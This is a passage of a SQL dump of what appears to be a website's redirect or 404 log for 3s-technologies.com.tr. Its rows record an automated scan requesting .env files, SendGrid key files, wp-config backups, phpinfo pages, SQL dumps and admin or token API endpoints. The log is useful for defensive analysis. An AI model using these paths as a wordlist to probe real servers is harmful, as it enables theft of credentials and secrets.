00:00:00',301),(62448,'https://www.3s-technologies.com.tr/en/tiedostot/.env',NULL,'','',1,0,'2026-04-12 10:43:44','0000-00-00 00:00:00',301),(62449,'https://www.3s-technologies.com.tr/en/tmp/.env',NULL,'','',1,0,'2026-04-12 10:43:45','0000-00-00 00:00:00',301),(62450,'https://www.3s-technologies.com.tr/en/tmp/config/.env',NULL,'','',1,0,'2026-04-12 10:43:46','0000-00-00 00:00:00',301),(62451,'https://www.3s-technologies.com.tr/en/tmp/logs',NULL,'','',1,0,'2026-04-12 10:43:46','0000-00-00 00:00:00',301),(62452,'https://www.3s-technologies.com.tr/en/token.php',NULL,'','',1,0,'2026-04-12 10:43:47','0000-00-00 00:00:00',301),(62453,'https://www.3s-technologies.com.tr/en/tool/view/phpinfo.view.php',NULL,'','',1,0,'2026-04-12 10:43:47','0000-00-00 00:00:00',301),(62454,'https://www.3s-technologies.com.tr/en/tools/.env',NULL,'','',1,0,'2026-04-12 10:43:48','0000-00-00 00:00:00',301),(62455,'https://www.3s-technologies.com.tr/en/travel_form/.env',NULL,'','',1,0,'2026-04-12 10:43:48','0000-00-00 00:00:00',301),(62456,'https://www.3s-technologies.com.tr/en/ts/prime/.env',NULL,'','',1,0,'2026-04-12 10:43:49','0000-00-00 00:00:00',301),(62457,'https://www.3s-technologies.com.tr/en/tz.php',NULL,'','',1,0,'2026-04-12 10:43:49','0000-00-00 00:00:00',301),(62458,'https://www.3s-technologies.com.tr/en/u.php',NULL,'','',1,0,'2026-04-12 10:43:50','0000-00-00 00:00:00',301),(62459,'https://www.3s-technologies.com.tr/en/ubuntu/.env',NULL,'','',1,0,'2026-04-12 10:43:50','0000-00-00 00:00:00',301),(62460,'https://www.3s-technologies.com.tr/en/ui/.env',NULL,'','',1,0,'2026-04-12 10:43:51','0000-00-00 00:00:00',301),(62461,'https://www.3s-technologies.com.tr/en/unixtime/.env',NULL,'','',1,0,'2026-04-12 10:43:51','0000-00-00 00:00:00',301),(62462,'https://www.3s-technologies.com.tr/en/unsplash-downloader/.env',NULL,'','',1,0,'2026-04-12 10:43:52','0000-00-00 00:00:00',301),(62463,'https://www.3s-technologies.com.tr/en/up.php',NULL,'','',1,0,'2026-04-12 10:43:52','0000-00-00 00:00:00',301),(62464,'https://www.3s-technologies.com.tr/en/upfiles/.env',NULL,'','',1,0,'2026-04-12 10:43:53','0000-00-00 00:00:00',301),(62465,'https://www.3s-technologies.com.tr/en/upload/.env',NULL,'','',1,0,'2026-04-12 10:43:53','0000-00-00 00:00:00',301),(62466,'https://www.3s-technologies.com.tr/en/uploads/.env',NULL,'','',1,0,'2026-04-12 10:43:54','0000-00-00 00:00:00',301),(62467,'https://www.3s-technologies.com.tr/en/urlmem-app/.env',NULL,'','',1,0,'2026-04-12 10:43:54','0000-00-00 00:00:00',301),(62468,'https://www.3s-technologies.com.tr/en/user/.env.staging',NULL,'','',1,0,'2026-04-12 10:43:55','0000-00-00 00:00:00',301),(62469,'https://www.3s-technologies.com.tr/en/user/login',NULL,'','',1,0,'2026-04-12 10:43:55','0000-00-00 00:00:00',301),(62470,'https://www.3s-technologies.com.tr/en/user_info/.env',NULL,'','',1,0,'2026-04-12 10:43:56','0000-00-00 00:00:00',301),(62471,'https://www.3s-technologies.com.tr/en/v1/.env',NULL,'','',1,0,'2026-04-12 10:43:56','0000-00-00 00:00:00',301),(62472,'https://www.3s-technologies.com.tr/en/v1/admin',NULL,'','',1,0,'2026-04-12 10:43:57','0000-00-00 00:00:00',301),(62473,'https://www.3s-technologies.com.tr/en/v1/debug',NULL,'','',1,0,'2026-04-12 10:43:57','0000-00-00 00:00:00',301),(62474,'https://www.3s-technologies.com.tr/en/v1/private',NULL,'','',1,0,'2026-04-12 10:43:58','0000-00-00 00:00:00',301),(62475,'https://www.3s-technologies.com.tr/en/v2/.env',NULL,'','',1,0,'2026-04-12 10:43:58','0000-00-00 00:00:00',301),(62476,'https://www.3s-technologies.com.tr/en/var/backup/.env',NULL,'','',1,0,'2026-04-12 10:43:58','0000-00-00 00:00:00',301),(62477,'https://www.3s-technologies.com.tr/en/vendor/.env',NULL,'','',1,0,'2026-04-12 10:43:59','0000-00-00 00:00:00',301),(62478,'https://www.3s-technologies.com.tr/en/vendor/github.com/gobuffalo/envy/.env',NULL,'','',1,0,'2026-04-12 10:43:59','0000-00-00 00:00:00',301),(62479,'https://www.3s-technologies.com.tr/en/vendor/github.com/subosito/gotenv/.env',NULL,'','',1,0,'2026-04-12 10:44:00','0000-00-00 00:00:00',301),(62480,'https://www.3s-technologies.com.tr/en/vendors~main.f286c0f60bdc707d91a8.bundle.js',NULL,'','',1,0,'2026-04-12 10:44:00','0000-00-00 00:00:00',301),(62481,'https://www.3s-technologies.com.tr/en/vercel.json',NULL,'','',1,0,'2026-04-12 10:44:01','0000-00-00 00:00:00',301),(62482,'https://www.3s-technologies.com.tr/en/videos/.env',NULL,'','',1,0,'2026-04-12 10:44:01','0000-00-00 00:00:00',301),(62483,'https://www.3s-technologies.com.tr/en/vite.config.ts',NULL,'','',1,0,'2026-04-12 10:44:02','0000-00-00 00:00:00',301),(62484,'https://www.3s-technologies.com.tr/en/vm-docker-compose/.env',NULL,'','',1,0,'2026-04-12 10:44:02','0000-00-00 00:00:00',301),(62485,'https://www.3s-technologies.com.tr/en/vod_installer/.env',NULL,'','',1,0,'2026-04-12 10:44:03','0000-00-00 00:00:00',301),(62486,'https://www.3s-technologies.com.tr/en/vue-end/vue-til/.env',NULL,'','',1,0,'2026-04-12 10:44:03','0000-00-00 00:00:00',301),(62487,'https://www.3s-technologies.com.tr/en/vue/.env',NULL,'','',1,0,'2026-04-12 10:44:04','0000-00-00 00:00:00',301),(62488,'https://www.3s-technologies.com.tr/en/vue/vuecli/.env',NULL,'','',1,0,'2026-04-12 10:44:04','0000-00-00 00:00:00',301),(62489,'https://www.3s-technologies.com.tr/en/vue_crm/.env',NULL,'','',1,0,'2026-04-12 10:44:05','0000-00-00 00:00:00',301),(62490,'https://www.3s-technologies.com.tr/en/w.php',NULL,'','',1,0,'2026-04-12 10:44:05','0000-00-00 00:00:00',301),(62491,'https://www.3s-technologies.com.tr/en/web-dist/.env',NULL,'','',1,0,'2026-04-12 10:44:06','0000-00-00 00:00:00',301),(62492,'https://www.3s-technologies.com.tr/en/web.config',NULL,'','',1,0,'2026-04-12 10:44:06','0000-00-00 00:00:00',301),(62493,'https://www.3s-technologies.com.tr/en/web.php',NULL,'','',1,0,'2026-04-12 10:44:07','0000-00-00 00:00:00',301),(62494,'https://www.3s-technologies.com.tr/en/web/debug/default/view',NULL,'','',1,0,'2026-04-12 10:44:07','0000-00-00 00:00:00',301),(62495,'https://www.3s-technologies.com.tr/en/web/sitemariage/.env',NULL,'','',1,0,'2026-04-12 10:44:08','0000-00-00 00:00:00',301),(62496,'https://www.3s-technologies.com.tr/en/webpack-stats.json',NULL,'','',1,0,'2026-04-12 10:44:08','0000-00-00 00:00:00',301),(62497,'https://www.3s-technologies.com.tr/en/webpack.config.js',NULL,'','',1,0,'2026-04-12 10:44:09','0000-00-00 00:00:00',301),(62498,'https://www.3s-technologies.com.tr/en/webroot_path/.env',NULL,'','',1,0,'2026-04-12 10:44:09','0000-00-00 00:00:00',301),(62499,'https://www.3s-technologies.com.tr/en/website/.env',NULL,'','',1,0,'2026-04-12 10:44:10','0000-00-00 00:00:00',301),(62500,'https://www.3s-technologies.com.tr/en/websocket/.env',NULL,'','',1,0,'2026-04-12 10:44:10','0000-00-00 00:00:00',301),(62501,'https://www.3s-technologies.com.tr/en/webstatic/.env',NULL,'','',1,0,'2026-04-12 10:44:11','0000-00-00 00:00:00',301),(62502,'https://www.3s-technologies.com.tr/en/webui/.env',NULL,'','',1,0,'2026-04-12 10:44:11','0000-00-00 00:00:00',301),(62503,'https://www.3s-technologies.com.tr/en/well-known/.env',NULL,'','',1,0,'2026-04-12 10:44:12','0000-00-00 00:00:00',301),(62504,'https://www.3s-technologies.com.tr/en/whturk/.env',NULL,'','',1,0,'2026-04-12 10:44:12','0000-00-00 00:00:00',301),(62505,'https://www.3s-technologies.com.tr/en/windows/tests/9.2.x/.env',NULL,'','',1,0,'2026-04-12 10:44:13','0000-00-00 00:00:00',301),(62506,'https://www.3s-technologies.com.tr/en/windows/tests/9.3.x/.env',NULL,'','',1,0,'2026-04-12 10:44:13','0000-00-00 00:00:00',301),(62507,'https://www.3s-technologies.com.tr/en/wordpress/.env',NULL,'','',1,0,'2026-04-12 10:44:14','0000-00-00 00:00:00',301),(62508,'https://www.3s-technologies.com.tr/en/workspace/.env',NULL,'','',1,0,'2026-04-12 10:44:14','0000-00-00 00:00:00',301),(62509,'https://www.3s-technologies.com.tr/en/wp-config.old',NULL,'','',1,0,'2026-04-12 10:44:15','0000-00-00 00:00:00',301),(62510,'https://www.3s-technologies.com.tr/en/wp-config.php-backup',NULL,'','',1,0,'2026-04-12 10:44:15','0000-00-00 00:00:00',301),(62511,'https://www.3s-technologies.com.tr/en/wp-config.php~',NULL,'','',1,0,'2026-04-12 10:44:16','0000-00-00 00:00:00',301),(62512,'https://www.3s-technologies.com.tr/en/wp-config.txt',NULL,'','',1,0,'2026-04-12 10:44:16','0000-00-00 00:00:00',301),(62513,'https://www.3s-technologies.com.tr/en/wp-content/.env',NULL,'','',1,0,'2026-04-12 10:44:17','0000-00-00 00:00:00',301),(62514,'https://www.3s-technologies.com.tr/en/wp-content/debug.log',NULL,'','',1,0,'2026-04-12 10:44:17','0000-00-00 00:00:00',301),(62515,'https://www.3s-technologies.com.tr/en/wp-login/.env',NULL,'','',1,0,'2026-04-12 10:44:18','0000-00-00 00:00:00',301),(62516,'https://www.3s-technologies.com.tr/en/wp.php',NULL,'','',1,0,'2026-04-12 10:44:18','0000-00-00 00:00:00',301),(62517,'https://www.3s-technologies.com.tr/en/wp/.env',NULL,'','',1,0,'2026-04-12 10:44:19','0000-00-00 00:00:00',301),(62518,'https://www.3s-technologies.com.tr/en/wpp-config.php~',NULL,'','',1,0,'2026-04-12 10:44:19','0000-00-00 00:00:00',301),(62519,'https://www.3s-technologies.com.tr/en/www-data/.env',NULL,'','',1,0,'2026-04-12 10:44:20','0000-00-00 00:00:00',301),(62520,'https://www.3s-technologies.com.tr/en/x.php',NULL,'','',1,0,'2026-04-12 10:44:20','0000-00-00 00:00:00',301),(62521,'https://www.3s-technologies.com.tr/en/xx-final/vue-heroes/.env',NULL,'','',1,0,'2026-04-12 10:44:21','0000-00-00 00:00:00',301),(62522,'https://www.3s-technologies.com.tr/en/yarn.lock',NULL,'','',1,0,'2026-04-12 10:44:21','0000-00-00 00:00:00',301),(62523,'https://www.3s-technologies.com.tr/en/zmusic-frontend/.env',NULL,'','',1,0,'2026-04-12 10:44:22','0000-00-00 00:00:00',301),(62524,'https://www.3s-technologies.com.tr/en/:443/.env',NULL,'','',1,0,'2026-04-12 10:44:23','0000-00-00 00:00:00',301),(62525,'https://www.3s-technologies.com.tr/en/:80/.env',NULL,'','',1,0,'2026-04-12 10:44:23','0000-00-00 00:00:00',301),(62526,'https://www.3s-technologies.com.tr/en/:8080/.env',NULL,'','',1,0,'2026-04-12 10:44:24','0000-00-00 00:00:00',301),(62527,'https://www.3s-technologies.com.tr/en/:8081/.env',NULL,'','',1,0,'2026-04-12 10:44:24','0000-00-00 00:00:00',301),(62528,'https://www.3s-technologies.com.tr/en/:8443/.env',NULL,'','',1,0,'2026-04-12 10:44:25','0000-00-00 00:00:00',301),(62529,'https://www.3s-technologies.com.tr/en/sendgrid_email/.env',NULL,'','',1,0,'2026-04-12 10:44:25','0000-00-00 00:00:00',301),(62530,'https://www.3s-technologies.com.tr/en/.env.sendgrid',NULL,'','',1,0,'2026-04-12 10:44:26','0000-00-00 00:00:00',301),(62531,'https://www.3s-technologies.com.tr/en/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:26','0000-00-00 00:00:00',301),(62532,'https://www.3s-technologies.com.tr/en/sendgrid_keys.js',NULL,'','',1,0,'2026-04-12 10:44:27','0000-00-00 00:00:00',301),(62533,'https://www.3s-technologies.com.tr/en/private/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:27','0000-00-00 00:00:00',301),(62534,'https://www.3s-technologies.com.tr/en/config/private/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:28','0000-00-00 00:00:00',301),(62535,'https://www.3s-technologies.com.tr/en/backup/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:28','0000-00-00 00:00:00',301),(62536,'https://www.3s-technologies.com.tr/en/secrets/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:29','0000-00-00 00:00:00',301),(62537,'https://www.3s-technologies.com.tr/en/wp-content/uploads/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:30','0000-00-00 00:00:00',301),(62538,'https://www.3s-technologies.com.tr/en/wp-content/plugins/wp-mail-smtp/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:30','0000-00-00 00:00:00',301),(62539,'https://www.3s-technologies.com.tr/en/wp-content/plugins/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:30','0000-00-00 00:00:00',301),(62540,'https://www.3s-technologies.com.tr/en/modules/contrib/sendgrid_mail/sendgrid_mail.module',NULL,'','',1,0,'2026-04-12 10:44:31','0000-00-00 00:00:00',301),(62541,'https://www.3s-technologies.com.tr/en/modules/contrib/sendgrid_mail/sendgrid_mail.settings.php',NULL,'','',1,0,'2026-04-12 10:44:31','0000-00-00 00:00:00',301),(62542,'https://www.3s-technologies.com.tr/en/modules/contrib/sendgrid_mail/sendgrid_mail.services.yml',NULL,'','',1,0,'2026-04-12 10:44:32','0000-00-00 00:00:00',301),(62543,'https://www.3s-technologies.com.tr/en/modules/contrib/sendgrid_mail/translations/sendgrid_mail.fr.po',NULL,'','',1,0,'2026-04-12 10:44:32','0000-00-00 00:00:00',301),(62544,'https://www.3s-technologies.com.tr/en/wp-content/themes/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:33','0000-00-00 00:00:00',301),(62545,'https://www.3s-technologies.com.tr/en/wp-content/uploads/wp-mail-smtp/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:33','0000-00-00 00:00:00',301),(62546,'https://www.3s-technologies.com.tr/en/wp-content/backup/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:34','0000-00-00 00:00:00',301),(62547,'https://www.3s-technologies.com.tr/en/wp-includes/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:34','0000-00-00 00:00:00',301),(62548,'https://www.3s-technologies.com.tr/en/wp-content/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:35','0000-00-00 00:00:00',301),(62549,'https://www.3s-technologies.com.tr/en/wp-admin/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:35','0000-00-00 00:00:00',301),(62550,'https://www.3s-technologies.com.tr/en/sendgrid_keys',NULL,'','',1,0,'2026-04-12 10:44:36','0000-00-00 00:00:00',301),(62551,'https://www.3s-technologies.com.tr/en/.sendgrid/credentials',NULL,'','',1,0,'2026-04-12 10:44:36','0000-00-00 00:00:00',301),(62552,'https://www.3s-technologies.com.tr/en/.sendgrid/config',NULL,'','',1,0,'2026-04-12 10:44:37','0000-00-00 00:00:00',301),(62553,'https://www.3s-technologies.com.tr/en/config/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:37','0000-00-00 00:00:00',301),(62554,'https://www.3s-technologies.com.tr/en/config/sendgrid_config.json',NULL,'','',1,0,'2026-04-12 10:44:37','0000-00-00 00:00:00',301),(62555,'https://www.3s-technologies.com.tr/en/private/sendgrid_keys',NULL,'','',1,0,'2026-04-12 10:44:38','0000-00-00 00:00:00',301),(62556,'https://www.3s-technologies.com.tr/en/private/sendgrid_config',NULL,'','',1,0,'2026-04-12 10:44:38','0000-00-00 00:00:00',301),(62557,'https://www.3s-technologies.com.tr/en/backup/sendgrid_keys',NULL,'','',1,0,'2026-04-12 10:44:39','0000-00-00 00:00:00',301),(62558,'https://www.3s-technologies.com.tr/en/backup/sendgrid_config',NULL,'','',1,0,'2026-04-12 10:44:39','0000-00-00 00:00:00',301),(62559,'https://www.3s-technologies.com.tr/en/secrets/sendgrid_keys',NULL,'','',1,0,'2026-04-12 10:44:40','0000-00-00 00:00:00',301),(62560,'https://www.3s-technologies.com.tr/en/secrets/sendgrid_config',NULL,'','',1,0,'2026-04-12 10:44:40','0000-00-00 00:00:00',301),(62561,'https://www.3s-technologies.com.tr/en/config/sendgrid.py',NULL,'','',1,0,'2026-04-12 10:44:41','0000-00-00 00:00:00',301),(62562,'https://www.3s-technologies.com.tr/en/settings/sendgrid_keys',NULL,'','',1,0,'2026-04-12 10:44:41','0000-00-00 00:00:00',301),(62563,'https://www.3s-technologies.com.tr/en/settings/sendgrid_config',NULL,'','',1,0,'2026-04-12 10:44:42','0000-00-00 00:00:00',301),(62564,'https://www.3s-technologies.com.tr/en/config/settings/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:43','0000-00-00 00:00:00',301),(62565,'https://www.3s-technologies.com.tr/en/config/settings/sendgrid_config.json',NULL,'','',1,0,'2026-04-12 10:44:43','0000-00-00 00:00:00',301),(62566,'https://www.3s-technologies.com.tr/en/config/env/sendgrid.env',NULL,'','',1,0,'2026-04-12 10:44:44','0000-00-00 00:00:00',301),(62567,'https://www.3s-technologies.com.tr/en/config/env/sendgrid_keys.env',NULL,'','',1,0,'2026-04-12 10:44:44','0000-00-00 00:00:00',301),(62568,'https://www.3s-technologies.com.tr/en/instance/sendgrid_keys.py',NULL,'','',1,0,'2026-04-12 10:44:45','0000-00-00 00:00:00',301),(62569,'https://www.3s-technologies.com.tr/en/sendgrid_keys.txt',NULL,'','',1,0,'2026-04-12 10:44:45','0000-00-00 00:00:00',301),(62570,'https://www.3s-technologies.com.tr/en/sendgrid_keys.py',NULL,'','',1,0,'2026-04-12 10:44:46','0000-00-00 00:00:00',301),(62571,'https://www.3s-technologies.com.tr/en/keys/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:46','0000-00-00 00:00:00',301),(62572,'https://www.3s-technologies.com.tr/en/api_keys/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:46','0000-00-00 00:00:00',301),(62573,'https://www.3s-technologies.com.tr/en/config/packages/sendgrid.yaml',NULL,'','',1,0,'2026-04-12 10:44:47','0000-00-00 00:00:00',301),(62574,'https://www.3s-technologies.com.tr/en/config/secrets/prod/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:47','0000-00-00 00:00:00',301),(62575,'https://www.3s-technologies.com.tr/en/config/secrets/dev/sendgrid_keys.json',NULL,'','',1,0,'2026-04-12 10:44:48','0000-00-00 00:00:00',301),(62576,'https://www.3s-technologies.com.tr/en/config/sendgrid.php',NULL,'','',1,0,'2026-04-12 10:44:48','0000-00-00 00:00:00',301),(62577,'https://www.3s-technologies.com.tr/en/storage/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:44:49','0000-00-00 00:00:00',301),(62578,'https://www.3s-technologies.com.tr/en/backup/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:44:49','0000-00-00 00:00:00',301),(62579,'https://www.3s-technologies.com.tr/en/secrets/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:44:49','0000-00-00 00:00:00',301),(62580,'https://www.3s-technologies.com.tr/en/config/sendgrid.js',NULL,'','',1,0,'2026-04-12 10:44:50','0000-00-00 00:00:00',301),(62581,'https://www.3s-technologies.com.tr/en/private/sendgrid.json',NULL,'','',1,0,'2026-04-12 10:44:50','0000-00-00 00:00:00',301),(62582,'https://www.3s-technologies.com.tr/en/wp-config.php.orig',NULL,'','',1,0,'2026-04-12 10:44:51','0000-00-00 00:00:00',301),(62583,'https://www.3s-technologies.com.tr/en/phpinfo.phtml',NULL,'','',1,0,'2026-04-12 10:44:51','0000-00-00 00:00:00',301),(62584,'https://www.3s-technologies.com.tr/en/configs/application.ini',NULL,'','',1,0,'2026-04-12 10:44:53','0000-00-00 00:00:00',301),(62585,'https://www.3s-technologies.com.tr/en/_profiler/empty/search/results',NULL,'','',1,0,'2026-04-12 10:44:53','0000-00-00 00:00:00',301),(62586,'https://www.3s-technologies.com.tr/en/api/v1',NULL,'','',1,0,'2026-04-12 10:44:54','0000-00-00 00:00:00',301),(62587,'https://www.3s-technologies.com.tr/en/api/service',NULL,'','',1,0,'2026-04-12 10:44:54','0000-00-00 00:00:00',301),(62588,'https://www.3s-technologies.com.tr/en/api/system/info',NULL,'','',1,0,'2026-04-12 10:44:55','0000-00-00 00:00:00',301),(62589,'https://www.3s-technologies.com.tr/en/api/gateway',NULL,'','',1,0,'2026-04-12 10:44:55','0000-00-00 00:00:00',301),(62590,'https://www.3s-technologies.com.tr/en/api/command',NULL,'','',1,0,'2026-04-12 10:44:56','0000-00-00 00:00:00',301),(62591,'https://www.3s-technologies.com.tr/en/api/admin/user',NULL,'','',1,0,'2026-04-12 10:44:56','0000-00-00 00:00:00',301),(62592,'https://www.3s-technologies.com.tr/en/api/admin/user/password',NULL,'','',1,0,'2026-04-12 10:44:57','0000-00-00 00:00:00',301),(62593,'https://www.3s-technologies.com.tr/en/api/admin/user/status',NULL,'','',1,0,'2026-04-12 10:44:57','0000-00-00 00:00:00',301),(62594,'https://www.3s-technologies.com.tr/en/api/admin/auth',NULL,'','',1,0,'2026-04-12 10:44:58','0000-00-00 00:00:00',301),(62595,'https://www.3s-technologies.com.tr/en/api/admin/role',NULL,'','',1,0,'2026-04-12 10:44:58','0000-00-00 00:00:00',301),(62596,'https://www.3s-technologies.com.tr/en/api/admin/role/id',NULL,'','',1,0,'2026-04-12 10:44:59','0000-00-00 00:00:00',301),(62597,'https://www.3s-technologies.com.tr/en/api/admin',NULL,'','',1,0,'2026-04-12 10:44:59','0000-00-00 00:00:00',301),(62598,'https://www.3s-technologies.com.tr/en/api/v1/sms-sender',NULL,'','',1,0,'2026-04-12 10:45:00','0000-00-00 00:00:00',301),(62599,'https://www.3s-technologies.com.tr/en/api/v1/finchat/contact/manager',NULL,'','',1,0,'2026-04-12 10:45:00','0000-00-00 00:00:00',301),(62600,'https://www.3s-technologies.com.tr/en/api/v1/finchat/privilege-api/forwarder',NULL,'','',1,0,'2026-04-12 10:45:01','0000-00-00 00:00:00',301),(62601,'https://www.3s-technologies.com.tr/en/api/v1/finchat/privilege-api/forwarder/event',NULL,'','',1,0,'2026-04-12 10:45:01','0000-00-00 00:00:00',301),(62602,'https://www.3s-technologies.com.tr/en/api/v1/finchat/open-api',NULL,'','',1,0,'2026-04-12 10:45:02','0000-00-00 00:00:00',301),(62603,'https://www.3s-technologies.com.tr/en/api/upload',NULL,'','',1,0,'2026-04-12 10:45:02','0000-00-00 00:00:00',301),(62604,'https://www.3s-technologies.com.tr/en/api/savefile',NULL,'','',1,0,'2026-04-12 10:45:03','0000-00-00 00:00:00',301),(62605,'https://www.3s-technologies.com.tr/en/api/v1/files',NULL,'','',1,0,'2026-04-12 10:45:03','0000-00-00 00:00:00',301),(62606,'https://www.3s-technologies.com.tr/en/api/files.remote.share',NULL,'','',1,0,'2026-04-12 10:45:03','0000-00-00 00:00:00',301),(62607,'https://www.3s-technologies.com.tr/en/api/v1/netdisk/download',NULL,'','',1,0,'2026-04-12 10:45:04','0000-00-00 00:00:00',301),(62608,'https://www.3s-technologies.com.tr/en/app/api/bzycs.php',NULL,'','',1,0,'2026-04-12 10:45:04','0000-00-00 00:00:00',301),(62609,'https://www.3s-technologies.com.tr/en/src/api/config.js',NULL,'','',1,0,'2026-04-12 10:45:05','0000-00-00 00:00:00',301),(62610,'https://www.3s-technologies.com.tr/en/web/api/config.js',NULL,'','',1,0,'2026-04-12 10:45:05','0000-00-00 00:00:00',301),(62611,'https://www.3s-technologies.com.tr/en/api/v1/finchat/open-api/auth/token',NULL,'','',1,0,'2026-04-12 10:45:06','0000-00-00 00:00:00',301),(62612,'https://www.3s-technologies.com.tr/en/api/v1/account/oauth/token',NULL,'','',1,0,'2026-04-12 10:45:06','0000-00-00 00:00:00',301),(62613,'https://www.3s-technologies.com.tr/en/api/v1/account/oauth/ticket',NULL,'','',1,0,'2026-04-12 10:45:07','0000-00-00 00:00:00',301),(62614,'https://www.3s-technologies.com.tr/en/api/v1/tokens',NULL,'','',1,0,'2026-04-12 10:45:07','0000-00-00 00:00:00',301),(62615,'https://www.3s-technologies.com.tr/en/api/login',NULL,'','',1,0,'2026-04-12 10:45:08','0000-00-00 00:00:00',301),(62616,'https://www.3s-technologies.com.tr/en/api/auth',NULL,'','',1,0,'2026-04-12 10:45:08','0000-00-00 00:00:00',301),(62617,'https://www.3s-technologies.com.tr/en/api/authentication',NULL,'','',1,0,'2026-04-12 10:45:09','0000-00-00 00:00:00',301),(62618,'https://www.3s-technologies.com.tr/en/api/auth/v1/pin/verify',NULL,'','',1,0,'2026-04-12 10:45:09','0000-00-00 00:00:00',301),(62619,'https://www.3s-technologies.com.tr/en/api/register',NULL,'','',1,0,'2026-04-12 10:45:10','0000-00-00 00:00:00',301),(62620,'https://www.3s-technologies.com.tr/en/api/resetpassword',NULL,'','',1,0,'2026-04-12 10:45:10','0000-00-00 00:00:00',301),(62621,'https://www.3s-technologies.com.tr/en/info.log',NULL,'','',1,0,'2026-04-12 10:45:11','0000-00-00 00:00:00',301),(62622,'https://www.3s-technologies.com.tr/en/info.txt',NULL,'','',1,0,'2026-04-12 10:45:11','0000-00-00 00:00:00',301),(62623,'https://www.3s-technologies.com.tr/en/member/space/company/info.txt',NULL,'','',1,0,'2026-04-12 10:45:12','0000-00-00 00:00:00',301),(62624,'https://www.3s-technologies.com.tr/en/cmsmessages/information.aspx',NULL,'','',1,0,'2026-04-12 10:45:12','0000-00-00 00:00:00',301),(62625,'https://www.3s-technologies.com.tr/en/cmsmessages/information.aspx.cs',NULL,'','',1,0,'2026-04-12 10:45:13','0000-00-00 00:00:00',301),(62626,'https://www.3s-technologies.com.tr/en/module/info/include/mysql/phpcms_info.sql',NULL,'','',1,0,'2026-04-12 10:45:13','0000-00-00 00:00:00',301),(62627,'https://www.3s-technologies.com.tr/en/phpinfo.bak',NULL,'','',1,0,'2026-04-12 10:45:13','0000-00-00 00:00:00',301),(62628,'https://www.3s-technologies.com.tr/en/phpinfo.dev',NULL,'','',1,0,'2026-04-12 10:45:14','0000-00-00 00:00:00',301),(62629,'https://www.3s-technologies.com.tr/en/phpinfo.test',NULL,'','',1,0,'2026-04-12 10:45:14','0000-00-00 00:00:00',301),(62630,'https://www.3s-technologies.com.tr/en/phpinfo-prod',NULL,'','',1,0,'2026-04-12 10:45:15','0000-00-00 00:00:00',301),(62631,'https://www.3s-technologies.com.tr/en/phpinfo-preprod',NULL,'','',1,0,'2026-04-12 10:45:16','0000-00-00 00:00:00',301),(62632,'https://www.3s-technologies.com.tr/en/phpinfo.staging',NULL,'','',1,0,'2026-04-12 10:45:16','0000-00-00 00:00:00',301),(62633,'https://www.3s-technologies.com.tr/en/phpinfo.stg',NULL,'','',1,0,'2026-04-12 10:45:17','0000-00-00 00:00:00',301),(62634,'https://www.3s-technologies.com.tr/en/phpinfo-server',NULL,'','',1,0,'2026-04-12 10:45:17','0000-00-00 00:00:00',301),(62635,'https://www.3s-technologies.com.tr/en/phpinfo-server.php',NULL,'','',1,0,'2026-04-12 10:45:17','0000-00-00 00:00:00',301),(62636,'https://www.3s-technologies.com.tr/en/phpinfo.srv',NULL,'','',1,0,'2026-04-12 10:45:18','0000-00-00 00:00:00',301),(62637,'https://www.3s-technologies.com.tr/en/phpinfo-api',NULL,'','',1,0,'2026-04-12 10:45:18','0000-00-00 00:00:00',301),(62638,'https://www.3s-technologies.com.tr/en/phpinfoapi',NULL,'','',1,0,'2026-04-12 10:45:19','0000-00-00 00:00:00',301),(62639,'https://www.3s-technologies.com.tr/en/phpinfo_details.php',NULL,'','',1,0,'2026-04-12 10:45:19','0000-00-00 00:00:00',301),(62640,'https://www.3s-technologies.com.tr/en/phpinfo_details',NULL,'','',1,0,'2026-04-12 10:45:20','0000-00-00 00:00:00',301),(62641,'https://www.3s-technologies.com.tr/en/phpinfomolten.php',NULL,'','',1,0,'2026-04-12 10:45:20','0000-00-00 00:00:00',301),(62642,'https://www.3s-technologies.com.tr/en/phpinfodev',NULL,'','',1,0,'2026-04-12 10:45:21','0000-00-00 00:00:00',301),(62643,'https://www.3s-technologies.com.tr/en/shop/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:45:21','0000-00-00 00:00:00',301),(62644,'https://www.3s-technologies.com.tr/en/bitrix/admin/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:45:22','0000-00-00 00:00:00',301),(62645,'https://www.3s-technologies.com.tr/en/mambo/administrator/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:45:22','0000-00-00 00:00:00',301),(62646,'https://www.3s-technologies.com.tr/en/lib/zend/tool/framework/system/provider/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:45:23','0000-00-00 00:00:00',301),(62647,'https://www.3s-technologies.com.tr/en/wp-content/plugins/phpinfo',NULL,'','',1,0,'2026-04-12 10:45:23','0000-00-00 00:00:00',301),(62648,'https://www.3s-technologies.com.tr/en/wp-content/db.sql',NULL,'','',1,0,'2026-04-12 10:45:24','0000-00-00 00:00:00',301),(62649,'https://www.3s-technologies.com.tr/en/wp-content/mysql.sql',NULL,'','',1,0,'2026-04-12 10:45:24','0000-00-00 00:00:00',301),(62650,'https://www.3s-technologies.com.tr/en/wp-content/dump.sql',NULL,'','',1,0,'2026-04-12 10:45:25','0000-00-00 